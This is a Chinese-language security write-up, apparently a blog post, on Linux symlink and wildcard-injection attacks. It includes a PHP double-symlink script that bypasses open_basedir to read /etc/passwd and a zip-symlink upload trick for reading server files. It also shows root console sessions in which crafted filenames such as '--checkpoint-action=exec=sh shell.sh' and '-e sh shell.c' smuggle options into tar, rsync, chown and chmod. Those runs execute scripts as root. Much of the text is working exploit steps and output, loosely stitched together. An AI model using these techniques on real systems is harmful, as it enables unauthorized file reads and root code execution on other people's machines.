shell中:"`|$<>&()#;\\\"!~*" .
linux下的軟連接是逃離路徑控制的好方法,出了挺多問題的。
1,Wget ftp symbolic link attack (CVE-2014-4877)
簡單點說就是wget 獲取ftp上的東西時,當加-r參數時,去獲取某一個鏈接時,到了本地還是一個鏈接,而不是將目標機的鏈接後的文件下載回來,這樣***者就可以構造這樣一個軟連接,wget下載之後的文件就會指向***者要的文件,達到目錄穿越的目的。
2,Rsync path spoofing attack vulnerability(CVE-2014-9512 )
也是通過軟鏈接指向一個危險的文件
web程序
3,web server對符號鏈接處理不當可能導致越權訪問,如php 通用繞過open_basedir 讀取任意文件
<?php
mkdir("abc");
chdir("abc");
mkdir("etc");
chdir("etc");
mkdir("passwd");
chdir("..");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
mkdir("abc");
chdir("abc");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("abc/abc/abc/abc","tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");
unlink("tmplink"); //刪除
mkdir("tmplink");
?>
雙層軟連接,第一步新建一個軟連接穿越目錄,第二次新建軟連接依賴第一次軟連接並指向危險文件,可能指向位置還不存在,刪除第一步的軟連接,再在本地創建一個文件,這次真的指向了危險文件。
4,facebook本地文件讀取,服務端自動解壓zip,tar等支持符號鏈接的壓縮格式,可以通過符號讀取服務器文件
1). 創建一個符號鏈接文件指向/etc/passwd
ln -s /etc/passwd link
2). 壓縮文件,同時保留鏈接
zip --symlinks test.zip link
3). 上傳test.zip文件,系統會自動解壓縮
4). 頁面當中會返回/etc/passwd的內容
* 通配符在linux下的作用,做到自動添加參數,做到文件名當參數,還記得那個find ./ -name "libxml*" ,如果沒加雙引號第一步他就會在本shell下去匹配一個然後再執行find操作,利用這個特性我們可以創建參數文件,如-n,-c,可以通過touch -- -n 命令來創建:
牛逼之處就在於在本目錄下創建了-f,-r文件,然後執行rm的時候* 會去找-f,-r,實際執行的是rm -i -f -r ,
要刪除這兩個文件,也可使用rm -- -f哈哈,可以使用如下格式避免:cat ./*
這些命令包括:可用strace跟蹤過程
chown:--reference=RFILE 將所屬改爲.drf.php所屬,忽視前面的歸屬nobody:nobody
[root@defensecode public]# ls -al total 52 drwxrwxrwx. 2 user user 4096 Oct 28 17:47 . drwx------. 22 user user 4096 Oct 28 17:34 .. -rw-rw-r--. 1 user user 66 Oct 28 17:36 admin.php -rw-rw-r--. 1 user user 34 Oct 28 17:35 ado.php -rw-rw-r--. 1 user user 80 Oct 28 17:44 config.php -rw-rw-r--. 1 user user 187 Oct 28 17:44 db.php -rw-rw-r--. 1 user user 201 Oct 28 17:35 download.php-rw-r--r--. 1 leon leon 0 Oct 28 17:40 .drf.php-rw-rw-r--. 1 user user 43 Oct 28 17:35 file1.php -rw-rw-r--. 1 user user 56 Oct 28 17:47 footer.php -rw-rw-r--. 1 user user 357 Oct 28 17:36 global.php -rw-rw-r--. 1 user user 225 Oct 28 17:35 header.php -rw-rw-r--. 1 user user 117 Oct 28 17:35 inc.php -rw-rw-r--. 1 user user 111 Oct 28 17:38 index.php-rw-rw-r--. 1 leon leon 0 Oct 28 17:45 --reference=.drf.php-rw-rw----. 1 user user 66 Oct 28 17:35 password.inc.php -rw-rw-r--. 1 user user 94 Oct 28 17:35 script.php
執行chown -R nobody:nobody *.php
所有者就會變成leno,而不是nobody
[root@defensecode public]# chown -R nobody:nobody *.php Let's see who owns files now... [root@defensecode public]# ls -al total 52 drwxrwxrwx. 2 user user 4096 Oct 28 17:47 . drwx------. 22 user user 4096 Oct 28 17:34 .. -rw-rw-r--. 1 leon leon 66 Oct 28 17:36 admin.php -rw-rw-r--. 1 leon leon 34 Oct 28 17:35 ado.php -rw-rw-r--. 1 leon leon 80 Oct 28 17:44 config.php -rw-rw-r--. 1 leon leon 187 Oct 28 17:44 db.php -rw-rw-r--. 1 leon leon 201 Oct 28 17:35 download.php -rw-r--r--. 1 leon leon 0 Oct 28 17:40 .drf.php -rw-rw-r--. 1 leon leon 43 Oct 28 17:35 file1.php -rw-rw-r--. 1 leon leon 56 Oct 28 17:47 footer.php -rw-rw-r--. 1 leon leon 357 Oct 28 17:36 global.php -rw-rw-r--. 1 leon leon 225 Oct 28 17:35 header.php -rw-rw-r--. 1 leon leon 117 Oct 28 17:35 inc.php -rw-rw-r--. 1 leon leon 111 Oct 28 17:38 index.php -rw-rw-r--. 1 leon leon 0 Oct 28 17:45 --reference=.drf.php -rw-rw----. 1 leon leon 66 Oct 28 17:35 password.inc.php -rw-rw-r--. 1 leon leon 94 Oct 28 17:35 script.php
chmod:--reference=RFILE 將權限改成和RFILE一樣,忽略前面的定義
[root@defensecode public]# ls -al total 52 drwxrwxrwx. 2 user user 4096 Oct 28 17:47 . drwx------. 22 user user 4096 Oct 28 17:34 .. -rw-rw-r--. 1 leon leon 66 Oct 28 17:36 admin.php -rw-rw-r--. 1 leon leon 34 Oct 28 17:35 ado.php -rw-rw-r--. 1 leon leon 80 Oct 28 17:44 config.php -rw-rw-r--. 1 leon leon 187 Oct 28 17:44 db.php -rw-rw-r--. 1 leon leon 201 Oct 28 17:35 download.php -rw-r--r--. 1 leon leon 0 Oct 28 17:40 .drf.php -rw-rw-r--. 1 leon leon 43 Oct 28 17:35 file1.php -rw-rw-r--. 1 leon leon 56 Oct 28 17:47 footer.php -rw-rw-r--. 1 leon leon 357 Oct 28 17:36 global.php -rw-rw-r--. 1 leon leon 225 Oct 28 17:35 header.php -rw-rw-r--. 1 leon leon 117 Oct 28 17:35 inc.php -rw-rw-r--. 1 leon leon 111 Oct 28 17:38 index.php-rw-rw-r--. 1 leon leon 0 Oct 28 17:45 --reference=.drf.php-rw-rw----. 1 leon leon 66 Oct 28 17:35 password.inc.php -rw-rw-r--. 1 leon leon 94 Oct 28 17:35 script.php
[root@defensecode public]# chmod 000 * 現在看下文件權限: [root@defensecode public]# ls -al total 68 drwxrwxrwx. 2 user user 4096 Oct 29 00:41 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rwxrwxrwx. 1 user user 20480 Oct 28 19:13 admin.php -rwxrwxrwx. 1 user user 34 Oct 28 17:47 ado.php -rwxrwxrwx. 1 user user 187 Oct 28 17:44 db.php -rwxrwxrwx. 1 user user 201 Oct 28 17:43 download.php -rwxrwxrwx. 1 leon leon 0 Oct 29 00:40 .drf.php -rwxrwxrwx. 1 user user 43 Oct 28 17:35 file1.php -rwxrwxrwx. 1 user user 56 Oct 28 17:47 footer.php -rwxrwxrwx. 1 user user 357 Oct 28 17:36 global.php -rwxrwxrwx. 1 user user 225 Oct 28 17:37 header.php -rwxrwxrwx. 1 user user 117 Oct 28 17:36 inc.php -rwxrwxrwx. 1 user user 111 Oct 28 17:38 index.php -rw-r--r--. 1 leon leon 0 Oct 29 00:41 --reference=.drf.php -rwxrwxrwx. 1 user user 94 Oct 28 17:38 script.php
tar --checkpoint=1 --checkpoint-action=ACTION
[root@defensecode public]# ls -al total 72 drwxrwxrwx. 2 user user 4096 Oct 28 19:34 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rw-rw-r--. 1 user user 20480 Oct 28 19:13 admin.php -rw-rw-r--. 1 user user 34 Oct 28 17:47 ado.php -rw-r--r--. 1 leon leon 0 Oct 28 19:19 --checkpoint=1 -rw-r--r--. 1 leon leon 0 Oct 28 19:17 --checkpoint-action=exec=sh shell.sh -rw-rw-r--. 1 user user 187 Oct 28 17:44 db.php -rw-rw-r--. 1 user user 201 Oct 28 17:43 download.php -rw-rw-r--. 1 user user 43 Oct 28 17:35 file1.php -rw-rw-r--. 1 user user 56 Oct 28 17:47 footer.php -rw-rw-r--. 1 user user 357 Oct 28 17:36 global.php -rw-rw-r--. 1 user user 225 Oct 28 17:37 header.php -rw-rw-r--. 1 user user 117 Oct 28 17:36 inc.php -rw-rw-r--. 1 user user 111 Oct 28 17:38 index.php -rw-rw-r--. 1 user user 94 Oct 28 17:38 script.php -rwxr-xr-x. 1 leon leon 12 Oct 28 19:17 shell.sh
[root@defensecode public]# tar cf archive.tar * uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 可以看到執行了id命令並輸出了其結果 Once again, there are few files created by user 'leon'. -rw-r--r--. 1 leon leon 0 Oct 28 19:19 --checkpoint=1 -rw-r--r--. 1 leon leon 0 Oct 28 19:17 --checkpoint-action=exec=sh shell.sh -rwxr-xr-x. 1 leon leon 12 Oct 28 19:17 shell.sh 文件名 '--checkpoint=1' 和 '--checkpoint-action=exec=sh shell.sh' 作爲參數傳給了tar. [root@defensecode public]# cat shell.sh /usr/bin/id
Rsync -e, --rsh=COMMAND specify the remote shell to use
[root@defensecode public]# ls -al total 72 drwxrwxrwx. 2 user user 4096 Mar 28 04:47 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rwxr-xr-x. 1 user user 20480 Oct 28 19:13 admin.php -rwxr-xr-x. 1 user user 34 Oct 28 17:47 ado.php -rwxr-xr-x. 1 user user 187 Oct 28 17:44 db.php -rwxr-xr-x. 1 user user 201 Oct 28 17:43 download.php -rw-r--r--. 1 leon leon 0 Mar 28 04:45 -e sh shell.c -rwxr-xr-x. 1 user user 43 Oct 28 17:35 file1.php -rwxr-xr-x. 1 user user 56 Oct 28 17:47 footer.php -rwxr-xr-x. 1 user user 357 Oct 28 17:36 global.php -rwxr-xr-x. 1 user user 225 Oct 28 17:37 header.php -rwxr-xr-x. 1 user user 117 Oct 28 17:36 inc.php -rwxr-xr-x. 1 user user 111 Oct 28 17:38 index.php -rwxr-xr-x. 1 user user 94 Oct 28 17:38 script.php -rwxr-xr-x. 1 leon leon 31 Mar 28 04:45 shell.c Now root will try to copy all C files to the remote server. [root@defensecode public]# rsync -t *.c foo:src/ rsync: connection unexpectedly closed (0 bytes received so far) [sender] rsync error: error in rsync protocol data stream (code 12) at io.c(601) [sender=3.0.8] Let's see what happened... [root@defensecode public]# ls -al total 76 drwxrwxrwx. 2 user user 4096 Mar 28 04:49 . drwx------. 24 user user 4096 Oct 28 18:32 .. -rwxr-xr-x. 1 user user 20480 Oct 28 19:13 admin.php -rwxr-xr-x. 1 user user 34 Oct 28 17:47 ado.php -rwxr-xr-x. 1 user user 187 Oct 28 17:44 db.php -rwxr-xr-x. 1 user user 201 Oct 28 17:43 download.php -rw-r--r--. 1 leon leon 0 Mar 28 04:45 -e sh shell.c -rwxr-xr-x. 1 user user 43 Oct 28 17:35 file1.php -rwxr-xr-x. 1 user user 56 Oct 28 17:47 footer.php -rwxr-xr-x. 1 user user 357 Oct 28 17:36 global.php -rwxr-xr-x. 1 user user 225 Oct 28 17:37 header.php -rwxr-xr-x. 1 user user 117 Oct 28 17:36 inc.php -rwxr-xr-x. 1 user user 111 Oct 28 17:38 index.php -rwxr-xr-x. 1 user user 94 Oct 28 17:38 script.php -rwxr-xr-x. 1 leon leon 31 Mar 28 04:45 shell.c -rw-r--r--. 1 root root 101 Mar 28 04:49 shell_output.txt There were two files owned by user 'leon', as listed below. -rw-r--r--. 1 leon leon 0 Mar 28 04:45 -e sh shell.c -rwxr-xr-x. 1 leon leon 31 Mar 28 04:45 shell.c After 'rsync' execution, new file shell_output.txt whose owner is root is created in same directory. -rw-r--r--. 1 root root 101 Mar 28 04:49 shell_output.txt If we check its content, following data is found. [root@defensecode public]# cat shell_output.txt uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Trick is that because of the '*.c' wildcard, 'rsync' got '-e sh shell.c' option on command line, and shell.c will be executed upon 'rsync' start. Content of shell.c is presented below. [root@defensecode public]# cat shell.c /usr/bin/id > shell_output.txt
scp -o ProxyCommand sh supercool.sh %h %p